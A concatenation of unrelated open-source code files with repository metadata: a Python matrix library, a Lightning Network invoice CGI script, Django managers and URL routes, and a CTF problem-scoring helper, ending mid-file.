return self._init_matrix_formatter(_float, _width, formatter)
# matrix STL iterators
class matrixIterator(object):
def __init__(self, Mat):
self.matrixArray = Mat
self.counter = self.__counter__()
def __iter__(self):
return self
## ! just for two dimensions for the moment
def __counter__(self):
def routine(iter, size, curr):
try:
iter[curr] += 1
except Exception:
pass
# check whether it is flow out
if iter[curr] >= size[curr]:
# last positon
if curr == 0:
return True
else:
# clear the current bit
iter[curr] = 0
# go into higher bit
return routine(iter, size, curr - 1)
return False
# commment the following lines when debug, other wise comment out
# when apply matrix 2 list this will be call
size = self.matrixArray._get_shape_array()
# initialization
tier = len(size)
# iteration indice
iter = tier * [0]
while True:
yield iter
# update
signal = routine(iter, size, tier - 1)
# exit processing
if signal:
break
def __next__(self):
try:
index = next(self.counter)
return self.matrixArray[tuple(index)]
except StopIteration:
raise StopIteration()
def nextIndex(self):
try:
index = next(self.counter)
return tuple(index)
except StopIteration:
raise StopIteration()
def __str__(self):
return "matrix iterator"
def setup_r_mode(self):
if self.R != True:
self.R = True
def clear_r_mode(self):
if self.R == True:
self.R = False
self.clear_headers().clear_indice()
def clear_headers(self):
self.col_indexList.clear()
self.Headers.clear()
return self
def clear_indice(self):
self.row_indexList.clear()
self.Indice.clear()
return self
def setIndice(self, l):
if not isinstance(l, list):
l = self._popCol(l)
if len(l) == 0:# pythonic way to check empty list
return -1
from itertools import zip_longest
self.row_indexList.append( dict(zip_longest(l,
range(0, self.size.row)
)) )
self.setup_r_mode(); self.Indice.append(l)
def isIndex(self, val):
for item in self.row_indexList:
if val in item:
return item[val]
def setheader(self, l):
if not isinstance(l, list):
l = self._popRol(l)
if len(l) == 0:
return -1
from itertools import zip_longest
self.col_indexList.append( dict(zip_longest(l,
range(0, self.size.col)
)) )
self.setup_r_mode(); self.Headers.append(l)
def isheader(self, val):
for item in self.col_indexList:
if val in item:
return item[val]
def isIndexHeader(self, val):
result = self.isIndex(
val)
if result is not None:
return (result, 0)
result = self.isheader(
val)
if result is not None:
return (result, 1)
else:
return (None,None)
@property
def x_label_enabled(self):
return True if len(self.Indice) > 0 and len(self.Indice[0]) > 0 else False
@property
def y_label_enabled(self):
return True if len(self.Headers) > 0 and len(self.Headers[0]) > 0 else False
def _pop(self, *index):
# I will consider to extend its functionalities later
# basic logics is 'del' the object the matrix container referred
root = self.get_runtime_list()
return self.setitem(index, None, root, "-")
def _popCol(self, col):
# pythonic way to give data simutaneously
size, list = self.size, []
# collect data returned
for i in range(size.row):
list.append( self._pop(i, col) )
return list
def _popRol(self, row):
# pythonic way to give data simutaneously
size, list = self.size, []
# collect data returned
for i in range(size.col):
list.append( self._pop(row, i) )
return list
def web2list(self, web, header):
h = header; l = [[record[key] for key in h] for record in web]
# load data
self.setUp(l)
# set header
self.setheader(h)
#===========================================================================
# n-d matrix helper functions
#===========================================================================
def name(self):
return "matrixArrayLists:"
#===========================================================================
# elementary setup funciton from a iterable
#===========================================================================
def _toRow(self, r, c, l):
# row vector
if not c and (r and r == 1):
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return True
# row vector:[[0,1,2...]]
if c and c != 1 and (r and r == 1):
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return True
if c and c != 1 and not r:
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return True
def _toCol(self, r, c, l):
# col vector processing, simple mode
if r and r != 1 and not c:
for i in l:
if isinstance( i, list ):
self.append( i )
else:
self.append([i])
self.modifed_to_row_col = True
return True
# col vector processing, simple mode
if r and r != 1 and (c and c == 1):
# row vector:[[0],[1],[2],,,]
for i in l:
if isinstance( i, list ):
self.append( i )
else:
self.append([i])
self.modifed_to_row_col = True
return True
# col vector
if not r and (c and c == 1):
for i in l:
if isinstance( i, list ):
self.append( i )
else:
self.append([i])
self.modifed_to_row_col = True
return True
def clear(self):
super(matrixArrayLists, self).clear()
# clear up all related marks
# clear modified tag
self.clear_modify_tag()
# clear up all associated indice
self.clear_r_mode()
def clear_modify_tag(self):
if self.modifed_to_row_col is True:
self.modifed_to_row_col = False
def setUp(self, l=None, r=None, c=None, o=None):
# clearn up
self.clear()
# set up container values
if str(type(l)) == "<class 'list'>":
# calling from inside
if o == 'ori':
self.extend(l)
return
# for default situation, from outside
if r == None and c == None:
flag = True
for i in l:
if isinstance(i, list):
pass
else:
flag = False
break
if flag:
self.extend(l)
return
else:
c = 1
#===================================================================
# col - vector processing
#===================================================================
# col vector processing, simple mode
if r and r != 1 and not c:
for i in l:
if isinstance( i, list):
self.append( i )
else:
self.append([i])
self.modifed_to_row_col = True
return
# col vector processing, simple mode
if r and r != 1 and (c and c == 1):
# row vector:[[0],[1],[2],,,]
for i in l:
if isinstance( i, list):
self.append( i )
else:
self.append([i])
self.modifed_to_row_col = True
return
# col vector
if not r and (c and c == 1):
for i in l:
if isinstance(i, list):
self.append(i)
else:
self.append([i])
self.modifed_to_row_col = True
return
#===================================================================
# row vector processing
#===================================================================
# row vector
if not c and (r and r == 1):
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return
# row vector:[[0,1,2...]]
if c and c != 1 and (r and r == 1):
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return
if c and c != 1 and not r:
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return
#===================================================================
# special situation
#===================================================================
if r and r == 1 and c and c == 1:
if not isinstance(l[0], list):
self.extend([l])
self.modifed_to_row_col = True
else:
self.extend(l)
return
#===================================================================
# by default
#===================================================================
self.extend(l)
else:
it_index, it_value = l.__iter__(), l.__iter__()
while True:
try:
index, value = it_index.nextIndex(), it_value.__next__()
# use redefined method
# use customised magic expression "mat[:,[1,2,3],0,2:4] = another_matrix"
self[index] = value
# this is actually an expression
except StopIteration:
break
# modify shape accordingly
#===============================================================================
# basic matrix filling function, m = matrixArray(list1, list2, list3 ...)
#===============================================================================
def fillUp(self, *iterators):
obj = self
for itx in iterators:
itl, itr = ( obj.__iter__(), itx.__iter__())
while True:
try:
p, q = (itl.nextIndex(), itr.__next__())
# use redefined method
obj[p] = q
except StopIteration:
break
return self
def nil_multi(self, *args):
from copy import deepcopy
# To do
# check r, c, when it is used by user
super(matrixArrayLists, self).clear()
deep = len(args)
# set root node
root = [None for i in range(args[0])]
# initialize a queue
queue = []
queue.append((root,0))
# broad first searching
while len(queue) > 0:
child, i = queue.pop(0)
# modify children
for j in range(args[i]):
child[j] = deepcopy([None] * args[i+1])
if i+1 < deep-1:
queue.append( (child[j], i+1) )
else:
gchild = child[j]
for j in range(0, args[i+1]):
gchild[j] = Null()
# reset the empty matrix
self.setUp(root)
# this help funciton is exclusively for 2-demension case. I consider it seriously.
def nil(self, r, c, value=None):
from copy import deepcopy
# To do
# check r, c, when it is used by user
super(matrixArrayLists, self).clear()
self.setUp([deepcopy([deepcopy(value) for _ in range(c)]) for _ in range(r)])
# further extension form nil funciton
def Zeors(self, r, c=None):
if c == None:
self.nil(r, r, 0)
else:
self.nil(r, c, 0)
def __call__(self, key=None, value=None):
if key == None:
return self
elif \
key != None:
if value == None:
return super(matrixArrayLists, self).__getitem__(key)
elif \
value != None:
super(matrixArrayLists, self).__setitem__(key, value)
return self
@timmer
def tolist(self):
l = self.get_runtime_list()
# if it is a vector we need to leave it as list format
# vector processing
if len(l) == 1:
if isinstance(l[0],list):
l = l[0]
else:
for i, v in enumerate(l):
if isinstance(v, list):
if len(v) == 1 :
l[i] = v[0]
return l
def get_runtime_list(self):
return self(slice(0, len(self)))
def __setattr__(self, name, value):
if isinstance(name, tuple):
pass
elif True:
self.__dict__[name] = value
def __iter__(self):
return self.matrixIterator(self)
def setitem(self, id, element, l, type="+"):
# see idex processing from int, slice, list and tuple, .
# [[1],[1,2,3,4],[5]...] --> [1] or [1,2,3,4] or [5] --> [1,1,5], [1,2,5], [1,3,5],[1,4,5]..., depth first searching is applied to do such indexing
# this assuming that value will automaticaly fill the part what index indicates
# e.g.: 'matrix[[1,2,3],0] = value' means that find elements in 'value' to fill in a[1,0], a[2,0], a[3,0]
curr = 0
hook = l
while curr < len(id) -1:
try:
l = l[id[curr]]
curr += 1
if isinstance(l, list):
# bla bla bla
hook = l
else:
# bla bla bla
l = [l]
hook[id[curr-1]] = l;hook = l
except:
steps = id[curr] - len(l) + 1
# l.extend([Null() for _ in range(steps)])
l.extend([Null()] * steps)
while True:
try:
if type == "+":
# element casting
l[id[curr]] = element if not isinstance(element, self.__class__) \
else element.matrix2list(); break
elif type == "-":
# available for retrieve
return l.pop(id[curr])
else:
raise Exception("wrong type!")
except:
steps = id[curr] - len(l) + 1
# l.extend([Null() for _ in range(steps)])
l.extend([Null()] * steps)
@timmer
@index_map
def getitem(self, _id, l):
# see idex processing from int, slice, list and tuple
# [[1],[1,2,3,4],[5]...] --> [1] or [1,2,3,4] or [5] ...,
try:
return list(map(lambda idx: l.__getitem__(idx), _id))
except:
# this will be enhanced for some senarios
return [Null()]
def setitem_multi(self, ids, root, it, type="+"):
# deduce user behavior
# get all possible id for setting
def element_generator():
yield next(it) if hasattr(it,'__next__') else it
def routines(curr):
# exitance
if curr == depth:
for i in ids[curr-1]:
index[curr-1] = i
try:
self.setitem(index, next(element_generator()), root, type)
except StopIteration:
return
else:
for i in ids[curr-1]:
index[curr-1] = i
# push into functional stack
routines(curr+1)
def routines2(curr):
list = []
# exitance
if curr == depth:
for i in ids[curr-1]:
index[curr-1] = i
try:
list + [self.setitem(index, next(element_generator()), root, type)]
except StopIteration:
return list
else:
for i in ids[curr-1]:
index[curr-1] = i
# push into functional stack
list + routines(curr+1)
depth = len(ids)
# this initialization will reduce exception handling
index = depth * [0]
# running
if type == '+':
routines(1)
if type == '-':
return routines2(1)
# raise an error here
def getitem_multi(self, ids, root):
# convert tuple to list(queue) to obtain built-in methods
# breadth first strategy
l = len(ids)
stack = [(root, 0)]
final = []
while len(stack) != 0:
try:
child, axis = stack.pop(0)
# processing
for grdchild in self.getitem(ids[axis], child):
if axis < l - 1:
stack.append((grdchild, axis+1))
else:
# item = self.getitem(ids[axis], grdchild)
final.append( grdchild )
except IndexError as e:
print(e)
break
return final
def __setitem__(self, key, value):
size = self._get_shape_array()
# middleware preprocessing
hint = index_len(key, size)
# middleware preprocessing
key = index_val(key, size)
# get inner representation
root = self.get_runtime_list()
#print('first part of __setitme__ interface:', '{0:<2.6f}'.format(e), ' seconds\n')
# infer user 's attention
# enhanced functionality for better customers experience
if len(hint) == 1 or (size.__len__() > len(hint) and 1 in size): # should use >= provided that i cannot be exec if matrix is empty
# entry point
def get_offset():
result = [v for v in key]
for i in range(size.__len__()):
if size[i] != 1:
break
offset = [[0]] * i# errors might occur
offset.extend(result)
result = offset
for i in range(size.__len__()):
if size[len(size) - i - 1] != 1:
break
offset = [[0]] * i# errors
result.extend(offset)
return tuple(result)
# redefine
key = get_offset()
#print('second part of __setitme__ interface:', '{0:<2.6f}'.format(e), ' seconds\n')
if max(hint) <= 1:
self.setitem([item[0] for item in key], value, root)
else:
# the value might not has iterator, hence need error handler here
self.setitem_multi(key, root, value) if not hasattr(value, '__iter__') else \
self.setitem_multi(key, root, value.__iter__())
# make changes to the whole matrixArray
self.setUp(root)
return \
self
@timmer
@map_key
def __getitem__(self, key):
size = self._get_shape_array()
# middleware preprocessing
hint = index_len(key, size)
# middleware preprocessing
key = index_val(key, size)
# get inner representation of the query object
root = self.get_runtime_list()
try:
if max(hint) <= 1:
# return the value wrapped in the list
# judge this by user inputting and matrix demensions
if len(hint) == len(size):
slot = self.getitem_multi(key, root)
return slot[0]# 01
# user might use a simple way to get list data
if len(hint) + size.count(1) \
== len(size):
def realidx():
it = key.__iter__(); id = []
for i in size:
id.append([0] if i == 1 else next(it))
return id
real = realidx()
slot = self.getitem_multi(real, root)
return slot[0]# 02
else:
slot = self.getitem_multi( key, root)
return self.__class__(slot,r=hint[0])# 03
# number = slot[0][0] if isinstance(slot[0], list) else slot[0]
# return number if len(hint) == len(size) or 1 in size \
# else self.__class__(slot, r=hint[0])
# later I will wrap this method in middleWare postprocessing
# some additional adjugement to make sure it is safe and stable
# get inner representation of the query result
slot = self.getitem_multi(key, root); array = []
if len(hint) >= 3:
for i in range(len(hint) - 1):
if hint[len(hint) - 1 - i] != 1: break
hint = hint[0:len(hint) - i]
self.setitem_multi( tuple(map(list, map(range, hint))), array, iter(slot) )
# go
if len(hint) == 1:
return self.__class__(array, r=hint[0]) #04
else:
return self.__class__(array, r=hint[0], c=hint[1]) #05
except:
return Null()
def _str(self):
size = self.size
if len(size) > 2:
pass#return self.name() + '\n' + super(matrixArrayLists, self).__str__()
formatter = self.formatter
# string representation
out = []#""
pre = ' '
succ = '\n'
c = self.get_runtime_list()
# set title
out.extend([self.name() + '\n\n', "["]) # 0, 1 out += self.name() + "\n["# position 0
for a in range(len(c)):
out.append(pre) # out += pre # position 1 + self.col * (a + 1)
for b in range(len(c[a])):
out.append(self._element2str(a, b, c, formatter))# out += self._element2str(a, b, c, formatter)
for d in range(b + 1, b + size.col - len(c[a]) + 1):
out.append(self._element2str(a, d, c, formatter))# out += self._element2str(a, d, t, formatter)
# handling for special cases
if a < len(c) - 1:
out.extend([succ, pre])#out += succ
out.append("]\n")#out += "]\n"# position 1 + size.row * size.col
return out, \
size, \
formatter
def _header(self, axis=None,
formatter=None, l=None):
# string representation
out = []#""
pre = ' ' + ' '
succ = '\n'
# this is random, very dangerous
c = l
# add pre
out.append(pre)
for b in range(len(c)):
out.append(self._element2str_sim(0, b, c[b] , formatter))
for d in range(b + 1, b + axis - len(c) + 1):
out.append(self._element2str_sim(0, d, Null(), formatter))
out.append(succ)
print( out)
return out
# helper function for rendering
def _indice(self, axis=None,
formatter=None, l=None):
# string representation
out = []#""
pre = ' ' + ' '
succ = '\n'
# this is random, very dangerous
c = l
# add pre
out.append(pre)
for b in range(len(c)):
out.append(self._element2str_sim(b, 0, c[b] , formatter))
for d in range(b + 1, b + axis - len(c) + 1):
out.append(self._element2str_sim(b, 0, Null(), formatter))
out.append(succ)
return out
def __str__(self):
out, size, formatter = self._str()
if self.R == True:
# offset controlling, a, b parameters
# add header
a = 0
for item in self.Headers:
header = self._header(size.col, formatter, item)
out.insert(1, ''.join(header)); a += 1
# add index
for item in self.Indice:
# call this help function to dynamically change formatter
formatter.data = self.init_array_formatter(item)
index = self._indice(size.row, formatter, item)
# modify indice
self._modify_line(out, index[1:], a,
size)
# b = 0
# for line in out[a+1:]:
# pass#line.insert(0, index[b]); b += 1
return ''.join(out)
# out must be list so that it is mutable
def _modify_line(self, out, index, offset, size):
# ...
row = size.row
col = size.col
# modify header
for i in range(offset):
out[i + 1] = ' ' * len(index[0]) + out[i + 1]
# modify body
# empirical equation for this matrix
for i in range(row):
out[i*(col + 3) + offset + 1] = index[i] + out[i*(col + 3) + offset + 1]
# by index
def _element2str(self, a, b, c,
formatter):
# values errors logics wrapped here!
try:
return formatter(c[a][b], a, b)
except TypeError:
return formatter(c[a], a, b)
except IndexError:
return formatter('-' , a, b)
# by value
def _element2str_sim(self, a, b, c, formatter):
return formatter(c, a, b)
def _get_shape_array(self):
queue = []
shape = []
axis = 0
# updating axis
axis += 1
root = self.get_runtime_list()
# updating current axis
shape.append(len(root))
# start processing
queue.append((root,axis))
# compute next demensions
def routines(obj, shape, axis, queue):
while len(queue) > 0:
child, axis = queue.pop(0)
# temporary storage
array = []
if len(child) == 0: array.append( 0)
elif len(child) >= 1:
# broadth first searching
for i in range(len(child)):
if isinstance(child[i], list):
array.append(len(child[i]))
queue.append((child[i], axis+1))
elif True:
array.append(1)
# updating current axis - maximu lenth
# axis control the looping layer
_max = max(array)
# try to update shape
try:
if shape[axis] < _max:
shape[axis] = _max
except:
shape.append(_max)
routines(root, shape, axis, queue)
return shape[0:-1]
def trp(self):
size = self.size
mat = self.__class__(size.col, size.row)
for i in range(size.col):
for j in range(size.row):
mat[i,j] = self[j,i]
return mat
def is_equal(self, obj):
return self.size.assert_equal(obj.size) if isinstance(obj, self.__class__) else (self.size, None, False); raise(Exception('wrong types: should be matrix'))
def is_tolerate(self, obj):
return self.size.assert_tolerate(obj.size) if isinstance(obj, self.__class__) else (self.size, None, False); raise(Exception('wrong types: should be matrix'))
#===============================================================================
# operations between matrix
#===============================================================================
def union(*c, direction='l2r'):
'''
Created on 10 Dec, 2014
@author: wangyi, Researcher Associate @ EIRAN, Nanyang Technological University
@email: L.WANG@ntu.edu.sg
@copyright: 2014 www.yiak.co. All rights reserved.
@license: license
@param:
@decription:
@param: union
'''
def routine(left, right, direction):
if direction == 'l2r':
if isinstance(left, matrixArrayLists) and isinstance(right, matrixArrayLists):
for i in range(0, max(left.size[0], right.size[0])):
r = left[i]
if r != None:
# see documentation for difference between () and []
left(i).extend(right[i])
elif r == None:
# do assignment
left[i]=right[i]
elif direction == 'u2d':
if isinstance(left, matrixArrayLists) and isinstance(right, matrixArrayLists):
for i in range(0, max(left.size[1], right.size[1])):
# see documentation for difference between () and []
left.append(right(i))
# create an empty matrix
a = matrixArrayLists()
# mian loop
for b in c:
routine(a, b, direction)
# print a for test
return a
def row(m,i,j):
temp = m[i,:]
m[i,:] = m[j,:]
m[j,:] = temp
def col(m,i,j):
temp = m[:,i]
m[:,i] = m[:,j]
m[:,j] = temp
import math
from operator import *
# this is one of key features provided by Python3
from functools import reduce
from statistics import *
# TO DO PYCUDA IMPLEMENTATION
class matrixArrayNum(matrixArrayLists):
def __init__(self, *args, **hints):
super(matrixArrayNum, self).__init__(*args, **hints)
def match(self):
"""
match will extract the insection of indice and and headers of self and all iteralbles.
"""
pass
def name(self):
return "matrixArrayNum:"
def map(self, Func, *iterables):
# do some preprocessing
# match self with *iterables
map_object = map(Func, self, *iterables)
try:
args = self.size.append([m for m in map_object])
except:
pass
# post processing
return self.__class__(*args)#self.__class__([m for m in map_object])
def add_matrix(self, obj):
return self.map(add, obj) if all(self.is_equal(obj)) \
else self.map(lambda v: v + obj)# error will be raised inside
__add__ = add_matrix
__radd__ = __add__
def sub_matrix(self, obj):
return self.map(sub, obj) if all(self.is_equal(obj)) \
else self.map(lambda v: v - obj)# error will be raised inside
__sub__ = sub_matrix
__rsub__ = __sub__
def neg_matrix(self):
return self.map(neg)
__neg__ = neg_matrix
# self add module
# single operant operator
def iad_matrix(self, other):
return self.add_matrix(other)
__iadd__ \
= iad_matrix
def dot_in(self, obj):
sizel, sizer , flag = self.is_tolerate(obj)
if flag == False:
return self.map(lambda v: v * obj)
# return numeric value
if sizel.row == 1 and sizer.col == 1:
sum = 0.0
for k in range(sizel.col):
sum += self[0,k] * obj[k,0]
return sum
# return matrixArray-series object
mat = self.__class__(sizel.row, sizer.col)
for i in range(sizel.row):
for j in range(sizer.col):
sum = 0.0
for k in range(sizel.col):
sum += self[i,k] * obj[k,j]
mat[i,j] = sum
return mat
# idealy if the two vectors are tolerated to each other we call dot_in. Otherwise, if they have the same size we call dot_out
__mul__ = dot_in
__rmul__ = __mul__
def dot_out(self, obj):
pass
def div_matrix(self, obj):
sizel, sizer , flag = self.is_tolerate(obj)
if flag == False:
return self.map(lambda v: v / obj)
__truediv__ = div_matrix
# one way to implement mean of matrix: matrix algebra, this is an example, not recommended
# because if the matrix a row vector, .mean_vt cannot summerise a result
def mean_vt(self, index=None):
result = self[0,:]; size = self.size
# add rows
for i in range( 1, size.row ):
result += self[i,:]
return result / size.row
def ubds_vt(self, index=None):
# older method to implement it has been deprecated
# check size now
if index != None:
return ubds(self[:, index])
return ubds(self)
## These funtions deal with relationship between matrices
def isum(*c, offset=0):
"""
matrixArrayNum sub over matrice
@param c: matrice
"""
return sum(c , offset) if len(c) > 1 else sum(c[0])
def imean(*c):
"""
This function will cacualted vector mean alone any axes. Currently it just supports nd matrix or 1d vector.
@param c: matrice
"""
return sum(c)/len(c) if len(c) > 1 else mean(c[0])
def ubds(*c):
"""
@param c: matrice
"""
def ubd(v):
new_v = [(i-m) **2 for i in v]
# in case of row or col vectors
return math.sqrt( sum(new_v) ) / len(new_v)
if len(c) > 1:
return [ubds(item) for item in c]
else:
# vector, ubds: 1/n * sqrt( sum ( [(v - mean) ** 2 for v in vector] ) )
# matrix, ubds: [ubds(col) for col in matrix]
size = c[0].size
if size.col == 1 or size.row == 1:
vector = c[0]; m = mean(vector)# hint
return ubd(vector)
else:
matrix = c[0]
# matrix api does not provides col selector
return [ubds(matrix[:,i]) for i in range(size.col)]
class matrixArray(matrixArrayNum):
def __init__(self, *args, **hints):
super(self.__class__, self).__init__(*args, **hints)
def name(self):
return "matrixArray:"
# for easy testing purpose
a = _TEST_MATRIX_MULTI = matrixArrayNum([
[['000', '001', '002'], ['010', '011', '012'], ['020', '021', '022']],
[['100', '101', '102'], ['110', '111', '112'], ['120', '121', '122']],
[['200', '201', '202'], ['210', '211', '212'], ['220', '221', '222']],
[['300', '301', '302'], ['310', '311', '312'], ['320', '321', '322']]
])
b = _TEST_COMPUT = matrixArrayNum(5, 5)
from numpy import array
e = _TEST_array = array([
[['000', '001', '002'], ['010', '011', '012'], ['020', '021', '022']],
[['100', '101', '102'], ['110', '111', '112'], ['120', '121', '122']],
[['200', '201', '202'], ['210', '211', '212'], ['220', '221', '222']],
[['300', '301', '302'], ['310', '311', '312'], ['320', '321', '322']]
])
if __name__ == "__main__":
# 2015 5:
# a[:]
# b = a[:,:,0]
# b = matrixArrayNum([[1,2,3,],[4,5,6]])
# b[0, 5] = 100
# b[5] = 100
# b.setheader(['header_1', 'header_2'])
# print(b)
# b[[0,5],[0,5]]
# print(b)
# b.setIndice('header_1')
# c = b.trp() * b
# b[0,10] = -1
# b.clear()
# b[5] = 100
# print(b)
# var = input("please input...\n")
# print(var)
# pass
# 2015 4:
# print(matrixArrayNum([[1,2],[3,4],[5,6]]).mean_vt())
# print(matrixArrayNum([[1,2],[3,4],[5,6]]).ubds_vt())
import random
import time
#print(b)
d = b.get_runtime_list()
start = time.time()
for i in range(100):
for j in range(50):
c = b[i,j]
#b[i,j] = random.randrange(1, 1000)
#d[i][j] = random.randrange(1, 1000)
# print( b )
elpse = time.time() - start
print(elpse)
# 2015 3:
# a = matrixArrayNum([1,1]);print(a)
# b = matrixArrayNum([1,1])
# c = matrixArrayNum([1,1])
#
# b + 0
# print(isum(a,b,c))
# ubds(a)
#
# a = a / 2.0
# print(a)
# 2015 3, middleware has been removed into another package as an independent work:
#
# b = matrixArrayNum([[1,2],[3,4]])
# b.setHeader(['time','power'])
# b.setIndice(['1','2'])
#
# c = matrixArray([[1,2],[3,4]])
# c.trp()
# print(c[0])
#
# c.addh(checkRIndex, matrixArrayLists.__getitem__)
# c.setHeader(['time','power'])
# c.setIndice(['1','2'])
#
# print(a[[1,2],[1,2],[1,2]])
# print(a[[1,2],[1,2],0])
|
yiakwy/numpy
|
PyMatrix/v4/matrixArray.py
|
Python
|
bsd-3-clause
| 56,236
|
#!/usr/bin/python3
import cgi
import os
import sys
import codecs
import binascii
import grpc
import rpc_pb2 as ln
import rpc_pb2_grpc as lnrpc
def connect():
# Due to updated ECDSA generated tls.cert we need to let gprc know that
# we need to use that cipher suite otherwise there will be a handshake
# error when we communicate with the lnd rpc server.
os.environ["GRPC_SSL_CIPHER_SUITES"] = 'HIGH+ECDSA'
with open('/home/lnd/.lnd/tls.cert', 'rb') as f:
cert = f.read()
with open('/home/lnd/.lnd/data/chain/bitcoin/mainnet/invoice.macaroon', 'rb') as f:
macaroon_bytes = f.read()
macaroon = codecs.encode(macaroon_bytes, 'hex')
def metadata_callback(_context, callback):
# for more info see grpc docs
callback([('macaroon', macaroon)], None)
# build ssl credentials using the cert the same as before
cert_creds = grpc.ssl_channel_credentials(cert)
# now build meta data credentials
auth_creds = grpc.metadata_call_credentials(metadata_callback)
# combine the cert credentials and the macaroon auth credentials
# such that every call is properly encrypted and authenticated
combined_creds = grpc.composite_channel_credentials(cert_creds, auth_creds)
# finally pass in the combined credentials when creating a channel
channel = grpc.secure_channel('localhost:10009', combined_creds)
stub = lnrpc.LightningStub(channel)
return stub
def main():
stub = connect()
form = cgi.FieldStorage()
value = int(form["value"].value) if "value" in form.keys() else 0
memo = form["memo"].value if "memo" in form.keys() else ""
invoice = stub.AddInvoice(ln.Invoice(memo=memo, value=value))
print("Content-Type: application/json; charset=UTF-8")
print("")
print('{"r_hash":"%s","payment_request":"%s","add_index":%d}'
% (str(binascii.hexlify(invoice.r_hash),"ascii"),
invoice.payment_request, invoice.add_index))
debug = False
#debug = True
if debug:
sys.stderr = sys.stdout
try:
main()
except Exception:
import traceback
print("Status: 500 Internal Error")
print("Content-Type: text/html; charset=UTF-8")
print("")
print("<h1>500 Internal Server Error</h1>")
if debug:
print("<pre>")
traceback.print_exc()
print("</pre>")
else:
traceback.print_exc()
|
jhoenicke/mempool
|
web/lnd/invoice.py
|
Python
|
agpl-3.0
| 2,378
|
import unittest
import threading
import os
from PyQt5.QtCore import Qt
from PyQt5.QtTest import QTest
from mpfmonitor.core.mpfmon import *
"""class InitMPFMon(unittest.TestCase):
@classmethod
def setUpClass(self):
app = QApplication(sys.argv)
machine_path = os.path.join(os.getcwd(), "machine_files")
self.mpfmon_sut = MainWindow(app, machine_path, None, testing=True)
QTest.qWait(5000)
def test_case(self):
self.assertEqual(True, True)
"""
if __name__ == '__main__':
unittest.main()
|
missionpinball/mpf-monitor
|
mpfmonitor/tests/test_mpfmon.py
|
Python
|
mit
| 545
|
from django.db import models
from django.core.exceptions import EmptyResultSet
class SistemaManager(models.Manager):
""" Manager utilizado para interações com os Sistemas de Cultura """
def get_queryset(self):
queryset = super().get_queryset()
queryset = queryset.distinct('ente_federado__nome', 'ente_federado')
return queryset.filter(id__in=queryset).select_related()
class HistoricoManager(models.Manager):
"""
Manager responsavel pelo gerenciamento de histórico de um determinado ente federado.
"""
def ente(self, cod_ibge=None):
""" Retorna o histórico de um ente federado """
if not cod_ibge:
raise EmptyResultSet
return self.filter(ente_federado__cod_ibge=cod_ibge)
|
culturagovbr/sistema-nacional-cultura
|
adesao/managers.py
|
Python
|
agpl-3.0
| 768
|
from typing import NamedTuple, Optional
from django.contrib.auth import get_user_model
from problem.models import ProblemInstance
from .score import calculate_problem_score
User = get_user_model()
class UserProblemInfo(NamedTuple):
user: User
problem_instance: ProblemInstance
solved: bool
first_solver: Optional[User]
solver_count: int
solver_list: list
effective_points: int
def display_first_solve(self):
return self.first_solver is None or self.user == self.first_solver
def get_user_problem_info(user, problem_instance):
solved_log = problem_instance.problemauthlog_set \
.filter(auth_key=problem_instance.problem.auth_key) \
.order_by('datetime')
first_solver = solved_log.first().user if solved_log.exists() else None
solved = solved_log.filter(user=user).exists()
solve_count = solved_log.count()
solve_user_list = list(map(lambda x: x.user.username, solved_log))
effective_solve_count = solve_count + (0 if solved else 1)
first_blood = first_solver is None or user == first_solver
points = calculate_problem_score(problem_instance, effective_solve_count, first_blood)
return UserProblemInfo(user, problem_instance, solved, first_solver, solve_count, solve_user_list, points)
def get_problem_list_user_info(problem_list, user):
problem_instances = problem_list.probleminstance_set.order_by('points', 'problem__title')
problem_info = []
user_score = 0
for problem_instance in problem_instances:
info = get_user_problem_info(user, problem_instance)
if info.solved:
user_score += info.effective_points
problem_info.append(info)
return problem_info, user_score
def get_problem_instance_score(problem_instance, fixed=False): # no first blood points in account
if fixed:
return problem_instance.points
solved_log = problem_instance.problemauthlog_set \
.filter(auth_key=problem_instance.problem.auth_key) \
.order_by('datetime')
solve_count = solved_log.count()
return calculate_problem_score(problem_instance, solve_count, False)
def get_problem_list_user_score(problem_list, user, fixed=False):
problem_instances = problem_list.probleminstance_set.order_by('points', 'problem__title')
user_score = 0
for problem_instance in problem_instances:
solved = problem_instance.problemauthlog_set.filter(user=user, auth_key=problem_instance.problem.auth_key).exists()
if solved:
user_score += get_problem_instance_score(problem_instance, fixed)
return user_score
def get_problem_list_total_score(problem_list, fixed=False): # no first blood points in account
problem_instances = problem_list.probleminstance_set.all()
total = 0
for problem_instance in problem_instances:
total += get_problem_instance_score(problem_instance, fixed)
return total
|
PLUS-POSTECH/study.plus.or.kr
|
src/problem/helpers/problem_info.py
|
Python
|
apache-2.0
| 2,919
|
#!/usr/bin/env python
from TweetGrabber import *
|
weilneb/twitter-utils
|
twutils/__init__.py
|
Python
|
mit
| 48
|
from django.conf.urls import url, include
from check.core.views import *
urlpatterns = [
url(r'', include('django.contrib.auth.urls')),
url(r'^index/', IndexView.as_view(), name='index'),
url(r'^cliente/$', ListCliente.as_view(), name='list_cliente'),
url(r'^cliente/add$', CreateCliente.as_view(), name='create_cliente'),
url(r'^cliente/edit/(?P<pk>\d+)$', UpdateCliente.as_view(), name='update_cliente'),
url(r'^cliente/delete/(?P<pk>\d+)$', DeleteCliente.as_view(), name='delete_cliente'),
url(r'^fornecedor/$', ListFornecedor.as_view(), name='list_fornecedor'),
url(r'^fornecedor/add$', CreateFornecedor.as_view(), name='create_fornecedor'),
url(r'^fornecedor/edit/(?P<pk>\d+)$', UpdateFornecedor.as_view(), name='update_fornecedor'),
url(r'^fornecedor/delete/(?P<pk>\d+)$', DeleteFornecedor.as_view(), name='delete_fornecedor'),
url(r'^banco/$', ListBanco.as_view(), name='list_banco'),
url(r'^banco/add$', CreateBanco.as_view(), name='create_banco'),
url(r'^banco/edit/(?P<pk>\d+)$', UpdateBanco.as_view(), name='update_banco'),
url(r'^banco/delete/(?P<pk>\d+)$', DeleteBanco.as_view(), name='delete_banco'),
url(r'^empresa/$', UpdateEmpresa.as_view(), name='empresa'),
url(r'^cheque/emitir/$', ListChequeEmitido.as_view(), name='list_cheque_emissao'),
